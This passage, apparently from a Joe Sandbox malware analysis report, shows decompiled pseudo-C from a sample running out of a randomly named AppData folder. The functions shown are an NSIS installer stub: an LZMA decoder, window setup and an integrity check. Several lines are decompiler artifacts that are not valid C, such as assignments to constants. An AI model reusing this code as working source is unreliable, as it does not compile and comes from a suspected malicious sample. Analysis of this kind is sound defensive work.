								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}

0x00405d87
0x00405d90
0x00000000
0x00405d9d
0x00405d93
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 00405D87
FindClose.KERNEL32(00000000), ref: 00405D93

Strings

$B, xrefs: 00405D7D

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: $B
API String ID: 2295610775-2366330246
Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004035E3 Relevance: 54.5, APIs: 16, Strings: 15, Instructions: 213
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				signed short _t71;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0; // 0x753e70
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					_t71 =  *_t20(); // executed
					E004059E3("1033", _t71 & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t24 =  *0x423eb8; // 0x80
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x423f20 = _t24 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40; // 0x0
							if(__eflags != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t39 =  *0x423680; // 0x0
							_t42 = DialogBoxParamA( *0x423ea0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0; // 0x400000
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 = _t75;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x423ed8; // 0x7583dc
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x78
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004035e9
0x004035f2
0x004035f9
0x004035fb
0x0040360f
0x00403621
0x0040362b
0x00403630
0x00403636
0x00403649
0x00403649
0x00403654
0x004035fd
0x004035fd
0x00403608
0x00403608
0x00403659
0x0040365e
0x00403663
0x0040366c
0x00403678
0x004036ff
0x00403707
0x00403710
0x00403710
0x00403726
0x0040372c
0x0040373a
0x004037c9
0x004037d1
0x004037db
0x004037e0
0x004037e6
0x00403865
0x0040386a
0x0040386c
0x00403888
0x00000000
0x00403888
0x0040386e
0x00403874
0x0040387c
0x0040387c
0x00000000
0x00403874
0x004037f0
0x00403801
0x00403803
0x00403805
0x0040380c
0x0040380c
0x00403814
0x0040381c
0x0040381e
0x00403820
0x00403829
0x0040382c
0x00403832
0x00403832
0x00403838
0x00403851
0x0040385b
0x00000000
0x00403860
0x004037d3
0x004037d5
0x00000000
0x00403740
0x00403740
0x00403746
0x00403750
0x00403758
0x00403762
0x00403768
0x00403776
0x0040388d
0x0040388d
0x00000000
0x0040388d
0x0040377c
0x00403785
0x004037c4
0x00000000
0x004037c4
0x0040367e
0x0040367e
0x00403683
0x00000000
0x00000000
0x00403688
0x0040368d
0x0040369d
0x004036a2
0x004036a9
0x00000000
0x00000000
0x004036ad
0x004036af
0x004036bc
0x004036bc
0x004036c4
0x004036ca
0x004036f2
0x004036fa
0x00000000
0x004036dc
0x004036dd
0x004036e6
0x004036ec
0x004036ed
0x00000000
0x004036ed
0x004036e8
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036ea
0x004036ca

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

GetUserDefaultUILanguage.KERNELBASE(00000006,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004035FD

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
lstrlenA.KERNEL32(xzfdi,?,?,?,xzfdi,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ), ref: 004036BF
lstrcmpiA.KERNEL32(?,.exe,xzfdi,?,?,?,xzfdi,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
GetFileAttributesA.KERNEL32(xzfdi), ref: 004036DD
LoadImageA.USER32 ref: 00403726
RegisterClassA.USER32 ref: 0040376D
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
CreateWindowExA.USER32 ref: 004037BE
ShowWindow.USER32(00000005,00000000), ref: 004037F0
LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
GetClassInfoA.USER32 ref: 0040381C
GetClassInfoA.USER32 ref: 00403829
RegisterClassA.USER32 ref: 00403832
DialogBoxParamA.USER32 ref: 00403851

Strings

RichEd20, xrefs: 004037FC
@6B, xrefs: 00403735
"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" , xrefs: 004035EF
C:\Users\user\AppData\Local\Temp, xrefs: 00403663, 0040366B, 004036F9, 004036FF, 0040370F
.DEFAULT\Control Panel\International, xrefs: 0040363F
_Nb, xrefs: 0040377C, 00403781
RichEd32, xrefs: 00403807
C:\Users\user\AppData\Local\Temp\, xrefs: 004035E7
xzfdi, xrefs: 0040368D, 00403695, 004036A2, 004036EC, 004036F2
1033, xrefs: 00403603, 0040364F
Control Panel\Desktop\ResourceLocale, xrefs: 00403617
RichEdit, xrefs: 00403823
.exe, xrefs: 004036CC
RichEdit20A, xrefs: 00403814, 0040381A
p>u, xrefs: 004035E9

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$p>u$xzfdi
API String ID: 2262724009-4051914520
Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C5B Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				signed int _t63;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy\\rstmgknbahw.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy\\rstmgknbahw.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy", "C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy\\rstmgknbahw.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4; // 0xb600
					if(__eflags == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t63 =  *0x423eb4; // 0xb600
							_t65 = E004031DA(_t63 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x50207
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t79 =  *0x423eb4; // 0xb600
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4; // 0xb600
						if(__eflags != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x0
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x32d2
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

APIs

GetTickCount.KERNEL32 ref: 00402C6F
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,00000400), ref: 00402C8B

Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,80000000,00000003), ref: 00405760
Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,80000000,00000003), ref: 00402CD4
GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B

Strings

Null, xrefs: 00402D54
soft, xrefs: 00402D4B
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
C:\Users\user\AppData\Roaming\sspgadrjncoy, xrefs: 00402CB6, 00402CBB, 00402CC1
Inst, xrefs: 00402D42
